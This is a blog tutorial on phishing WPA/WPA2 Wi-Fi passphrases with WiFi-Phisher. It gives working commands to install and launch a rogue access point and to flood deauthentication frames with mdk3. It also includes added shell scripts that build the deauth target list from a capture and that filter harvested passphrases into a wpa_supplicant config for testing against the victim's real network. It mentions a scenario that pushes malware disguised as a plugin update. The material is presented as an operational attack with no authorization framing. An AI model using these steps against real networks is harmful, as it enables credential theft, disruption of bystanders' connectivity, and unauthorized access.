How To Phish A WiFi Wpa-Passphrase Using WiFi-Phisher

by hash3liZer, 22 June 2018

In this tutorial, we will use WiFi-Phisher, a rogue-access-point phishing utility, to capture the passphrases of nearby wireless networks by serving their users a forged web page. Phishing is never good practice as a first resort, but it is sometimes the right call when time is short, and there is no guarantee that it will work: it depends entirely on a user typing the passphrase into a page they should not trust. Since it illustrates the basics of phishing over the air, we will walk through its usage.

The evolution of WPA, and WPA2 in particular, has greatly strengthened wireless security over the air; with a strong passphrase, cracking a captured handshake offline is no longer practical. Phishing, by contrast, has always been a reliable if somewhat crude way of obtaining credentials, because it asks the user for the secret instead of attacking the cryptography. WiFi-Phisher automates that for us.

WiFi-Phisher makes use of two interfaces: one hosts the rogue access point, and a second, in monitor mode, performs the deauthentication (DoS) attack against the real access point. Optionally a third interface with Internet access can be used to forward the victims' traffic. By default it forwards nothing and redirects every HTTP request to the forged page, which is what the captive portal relies on. Hence we need two wireless adapters here, and optionally an Internet connection on another interface. You can skip the deauthentication step, but then you depend on users joining your network of their own accord, which takes far longer.

STEP 1

Clone

Clone the latest WiFi-Phisher version from GitHub and install it:

git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python setup.py install
(screenshot: wifiphisher installation)

STEP 2

Launch

As already mentioned, WiFi-Phisher makes use of two interfaces, one for the access point and the other for the deauthentication attack; the latter can be skipped if you want. Launch the script in one of the following ways:

wifiphisher -aI wlan1 -eI wlan0 -iI eth0 --essid "WiFiPhisher"

Note the arguments in the command above:

  • -aI: interface that will host the rogue access point (it must support AP mode).
  • -eI: extension interface, used to send the deauthentication frames (it must support monitor mode).
  • -iI: interface with an Internet connection, used to forward the victims' traffic.
  • --essid: name (ESSID) of the fake access point; giving it skips the access point selection phase.

If you do not want to provide Internet access and do not want to perform the deauthentication step:

wifiphisher -aI wlan0 --nodeauth --essid "WiFiPhisher"

If you want to scan the area and pick a target network first:

wifiphisher -aI wlan0 --nodeauth --noextensions
(screenshot: wifiphisher access point selection)
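Before assigning adapters to -aI and -eI it is worth confirming from `iw` that the radio behind the AP interface actually advertises AP mode and that the one behind the extension interface advertises monitor mode; many cheap adapters do one but not the other, and wifiphisher will fail late if they are the wrong way round. The script below is an added example, not part of wifiphisher or the original post. The `iw list` and `iw dev` outputs it parses are constructed samples (phy0 supports AP and monitor, phy1 supports monitor only); on a real host replace them with the live command output as the comment shows.

```shell
#!/usr/bin/env bash
# Added example (not wifiphisher's own code): check that the wiphy behind the
# AP interface advertises AP mode and the wiphy behind the extension interface
# advertises monitor mode before launching wifiphisher.
# IW_LIST and IW_DEV are constructed samples; on a real host use
#   IW_LIST="$(iw list)"; IW_DEV="$(iw dev)"

IW_LIST='Wiphy phy0
	Supported interface modes:
		 * IBSS
		 * managed
		 * AP
		 * AP/VLAN
		 * monitor
	Band 1:
		Frequencies:
Wiphy phy1
	Supported interface modes:
		 * managed
		 * monitor
	Band 1:
		Frequencies:'

IW_DEV='phy#0
	Interface wlan0
		ifindex 3
		type managed
phy#1
	Interface wlan1
		ifindex 4
		type managed'

# iface_phy IW_DEV_OUTPUT IFNAME: print the wiphy (e.g. phy1) that owns IFNAME.
iface_phy() {
    printf '%s\n' "$1" | awk -v ifname="$2" '
        /^phy#/ { cur = "phy" substr($1, 5) }
        /^[[:space:]]*Interface / && $2 == ifname { print cur; exit }'
}

# phy_supports_mode IW_LIST_OUTPUT PHY MODE: 0 if PHY lists MODE (AP, monitor,
# ...) under "Supported interface modes:", 1 otherwise. Exact match, so "AP"
# does not match "AP/VLAN".
phy_supports_mode() {
    printf '%s\n' "$1" | awk -v phy="$2" -v mode="$3" '
        /^Wiphy /                     { cur = $2; in_modes = 0 }
        /Supported interface modes:/  { in_modes = (cur == phy); next }
        in_modes && /^[[:space:]]*\* / {          # entry line: "\t\t * AP"
            sub(/^[[:space:]]*\* /, "")
            if ($0 == mode) found = 1
            next
        }
        in_modes { in_modes = 0 }                 # any other line ends the list
        END { exit found ? 0 : 1 }'
}

# preflight AP_IFACE EXT_IFACE: 0 and print the launch line if the roles fit
# the hardware, 1 with a reason on stderr otherwise.
preflight() {
    local ap="$1" ext="$2" ap_phy ext_phy ok=0
    ap_phy="$(iface_phy "$IW_DEV" "$ap")"
    ext_phy="$(iface_phy "$IW_DEV" "$ext")"
    if [ -z "$ap_phy" ] || [ -z "$ext_phy" ]; then
        echo "unknown interface: $ap / $ext" >&2; return 1
    fi
    if [ "$ap_phy" = "$ext_phy" ]; then
        echo "$ap and $ext share $ap_phy; wifiphisher needs two radios" >&2; return 1
    fi
    phy_supports_mode "$IW_LIST" "$ap_phy" AP       || { echo "$ap ($ap_phy) cannot run in AP mode" >&2; ok=1; }
    phy_supports_mode "$IW_LIST" "$ext_phy" monitor || { echo "$ext ($ext_phy) cannot run in monitor mode" >&2; ok=1; }
    [ "$ok" -eq 0 ] && echo "wifiphisher -aI $ap -eI $ext --essid \"WiFiPhisher\""
    return "$ok"
}

preflight wlan0 wlan1                          # prints the launch line
preflight wlan1 wlan0 || echo "swap the adapters" >&2
```

With the sample data, wlan0 (phy0) can be the AP and wlan1 (phy1) the deauthentication interface, but not the other way round, since phy1 never advertises AP mode.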

STEP 3

Scenario

Choose one of the phishing scenarios. The ones currently shipped are:

  1. Firmware Upgrade Page: a router configuration page that asks for the WPA/WPA2 passphrase to complete a firmware upgrade.
  2. Network Manager Connect: imitates the operating system's network manager, shows a connection failure and asks for the pre-shared key.
  3. Browser Plugin Update: presents the victims with a payload disguised as a plugin update; it serves malware, not the passphrase.
  4. OAuth Login Page: a free Wi-Fi portal asking for social-network credentials via OAuth, again not the passphrase.

For the goal of this tutorial, only the first two scenarios return the pre-shared key.
(screenshot: scenario selection)

STEP 4

Deauthentication

Now we deauthenticate the clients from the real access point so that they reconnect to ours. If you provided an extension interface at launch, this step is not necessary: WiFi-Phisher handles it itself, and all you have to do is wait. It can, however, take a long time for it to knock every client off the network as required.

If that is the case, deauthenticating manually helps. We will use mdk3 for this purpose, on a second interface in monitor mode; it cannot share the adapter that hosts the rogue AP. Create a blacklist file with the BSSIDs of the nearby access points whose clients you want to push off, and make sure your own rogue AP's BSSID is not among them, or you will kick the victims off the very network that serves the phishing page:

touch /tmp/blacklist.txt
echo 34:BF:90:4A:BB:57 >> /tmp/blacklist.txt
echo 00:0E:F4:DE:D9:61 >> /tmp/blacklist.txt
...

Then start mdk3:

mdk3 wlan0 d -b /tmp/blacklist.txt -c

Note the parameters above:

  • wlan0: the monitor-mode interface to send frames from.
  • d: deauthentication/disassociation "amok" mode; kicks everybody found on an AP.
  • -b: blacklist file containing the BSSIDs to run the attack against.
  • -c: channel hopping across all 14 channels, switching every 5 seconds. With no channel list it hops everywhere, so if you know the target's channel, pass it explicitly (e.g. -c 6) and it will stay there.
(screenshot: mdk3 deauthentication)
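Typing BSSIDs into the blacklist by hand is error-prone, and the one mistake that silently ruins the attack is listing the rogue AP's own BSSID. The script below is an added example, not from the original post or from mdk3: it builds the blacklist from an airodump-ng CSV capture, drops the rogue AP's BSSID, optionally keeps only access points on a chosen channel, and refuses to produce an empty file. The CSV is a constructed sample in airodump-ng's layout (AP section, blank line, then the "Station MAC" client section); the interface name wlan1mon and the use of -c 6 to pin mdk3 to channel 6 are assumptions for the usage line.

```shell
#!/usr/bin/env bash
# Added example (not from the original page, not mdk3's code): build the mdk3
# -b blacklist from an airodump-ng CSV instead of typing BSSIDs by hand, and
# never include the rogue AP's own BSSID. AIRODUMP_CSV is a constructed sample.
# ESSIDs containing commas are not handled by this simple parser.

AIRODUMP_CSV='BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
34:BF:90:4A:BB:57, 2018-06-22 10:00:01, 2018-06-22 10:05:10,  6,  54, WPA2, CCMP, PSK, -40, 120, 0, 0. 0. 0. 0, 9, HomeNet-1, 
00:0E:F4:DE:D9:61, 2018-06-22 10:00:03, 2018-06-22 10:05:09, 11,  54, WPA2, CCMP, PSK, -61, 80, 0, 0. 0. 0. 0, 7, CafeNet, 
AA:BB:CC:DD:EE:FF, 2018-06-22 10:00:05, 2018-06-22 10:05:11,  6,  54, OPN, , , -20, 200, 0, 0. 0. 0. 0, 11, WiFiPhisher, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2018-06-22 10:00:10, 2018-06-22 10:05:00, -50, 30, 34:BF:90:4A:BB:57, HomeNet-1'

# ap_blacklist CSV OWN_BSSID [CHANNEL]: print one upper-case BSSID per line
# from the AP section of an airodump-ng CSV, skipping OWN_BSSID (case-
# insensitive) and, if CHANNEL is given, every AP on another channel.
ap_blacklist() {
    local csv="$1" own="$2" chan="${3:-}"
    printf '%s\n' "$csv" | awk -F',' -v own="$(printf '%s' "$own" | tr a-f A-F)" -v chan="$chan" '
        /^Station MAC/     { exit }             # client section begins: stop
        /^BSSID/ || NF < 4 { next }             # header or blank separator line
        {
            bssid = toupper($1); gsub(/ /, "", bssid)
            ch = $4;             gsub(/ /, "", ch)
            if (bssid == own) next              # never deauth our own rogue AP
            if (chan != "" && ch != chan) next
            print bssid
        }'
}

# write_blacklist OUTFILE CSV OWN_BSSID [CHANNEL]: write only well-formed MACs
# to OUTFILE; return 1 if the list came out empty (mdk3 would have nothing to do).
write_blacklist() {
    local out="$1"; shift
    ap_blacklist "$@" | grep -E '^([0-9A-F]{2}:){5}[0-9A-F]{2}$' > "$out"
    [ -s "$out" ]
}

# Usage: the rogue AP is AA:BB:CC:DD:EE:FF; only push clients off the
# channel-6 neighbours, then keep mdk3 on channel 6 (assumed interface name).
write_blacklist /tmp/blacklist.txt "$AIRODUMP_CSV" AA:BB:CC:DD:EE:FF 6 && \
    echo "mdk3 wlan1mon d -b /tmp/blacklist.txt -c 6"
```

With the sample capture this writes a single line, 34:BF:90:4A:BB:57, to /tmp/blacklist.txt: CafeNet sits on channel 11 and WiFiPhisher is our own AP.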

STEP 5

Passphrase Posting

Now, when a client connects to the rogue AP, the captive portal kicks in and the client is redirected to our forged page. Everything that happens on the network, every incoming and outgoing request, is printed on the terminal. When the client submits the form containing the pre-shared key, all of the posted data is printed as well:

(screenshot: passphrase posting)

The password is: [email protected]
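A posted passphrase is only what the victim typed, and people mistype, guess or enter something deliberately wrong. Two checks are cheap before you act on it: a WPA/WPA2 passphrase is by definition 8 to 63 printable ASCII characters (IEEE 802.11i Annex H), so anything else cannot be the real pre-shared key, and whatever survives that filter should be tried against the genuine access point. The script below is an added example, not part of wifiphisher or the original post: it triages a constructed log of form submissions (timestamp, client MAC, passphrase, tab-separated, an assumed format) and emits a wpa_supplicant configuration with one network block per plausible candidate, which you would then run against the real network with something like `wpa_supplicant -i wlan1 -c /tmp/verify.conf` (that invocation is an assumption about your setup, not part of the script).

```shell
#!/usr/bin/env bash
# Added example (not wifiphisher's code): triage passphrases posted to the
# captive portal and turn the plausible ones into a wpa_supplicant config for
# verification against the real AP. SUBMISSIONS is a constructed sample in an
# assumed tab-separated "timestamp<TAB>client MAC<TAB>passphrase" format.

TAB="$(printf '\t')"
NL='
'

SUBMISSIONS="$(printf '%s\t%s\t%s\n' \
    '2018-06-22 12:01:05' 11:22:33:44:55:66 'short' \
    '2018-06-22 12:01:40' 11:22:33:44:55:66 'p@ssw0rd 2018!' \
    '2018-06-22 12:02:13' AA:AA:AA:AA:AA:AA 'café-wifi-2018' \
    '2018-06-22 12:03:50' 11:22:33:44:55:66 'HomeNet-1-G0ldfish')"

# valid_wpa_passphrase STRING: 0 if STRING could be a WPA-PSK passphrase:
# 8..63 characters, each printable ASCII (0x20..0x7E), no line breaks.
valid_wpa_passphrase() {
    local pw="$1"
    case "$pw" in *"$NL"*) return 1 ;; esac
    [ "${#pw}" -ge 8 ] && [ "${#pw}" -le 63 ] || return 1
    # LC_ALL=C makes the range byte-based, so UTF-8 characters are rejected
    printf '%s' "$pw" | LC_ALL=C grep -Eq '^[ -~]+$'
}

# plausible_submissions: read submission lines on stdin, echo only those whose
# passphrase field passes valid_wpa_passphrase; return 1 if none did.
plausible_submissions() {
    local ts mac pw n=0
    while IFS="$TAB" read -r ts mac pw; do      # pw keeps embedded spaces
        valid_wpa_passphrase "$pw" || continue
        printf '%s\t%s\t%s\n' "$ts" "$mac" "$pw"
        n=$((n + 1))
    done
    [ "$n" -gt 0 ]
}

# wpa_network_block ESSID PASSPHRASE: print a wpa_supplicant network{} block
# that only associates to a WPA2-PSK/CCMP network with that ESSID. Candidates
# containing a double quote are refused rather than guessing wpa_supplicant's
# quoting rules.
wpa_network_block() {
    case "$2" in *\"*) return 1 ;; esac
    printf 'network={\n\tssid="%s"\n\tpsk="%s"\n\tkey_mgmt=WPA-PSK\n\tproto=RSN\n\tpairwise=CCMP\n}\n' "$1" "$2"
}

# verify_conf ESSID SUBMISSIONS_TEXT: print a wpa_supplicant config with one
# network block per plausible candidate; wpa_supplicant tries them in turn.
verify_conf() {
    local essid="$1" ts mac pw
    echo 'ctrl_interface=/var/run/wpa_supplicant'
    printf '%s\n' "$2" | plausible_submissions | while IFS="$TAB" read -r ts mac pw; do
        echo "# submitted $ts by $mac"
        wpa_network_block "$essid" "$pw" || echo "# skipped: contains a double quote"
    done
}

verify_conf HomeNet-1 "$SUBMISSIONS"
```

Of the four constructed submissions only two survive: "short" is under 8 characters and "café-wifi-2018" contains a non-ASCII byte, so neither can be a WPA pre-shared key, and no time is wasted trying them.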

Conclusion

So, we saw how WiFi-Phisher automates the whole rogue-AP workflow for us. It offers a basic CLI with various options to control the script, a captive portal that makes the forged page far more convincing to clients, and four built-in phishing scenarios that can be used as required. Keep in mind that a phished passphrase is only what the user typed: verify it against the real network before relying on it.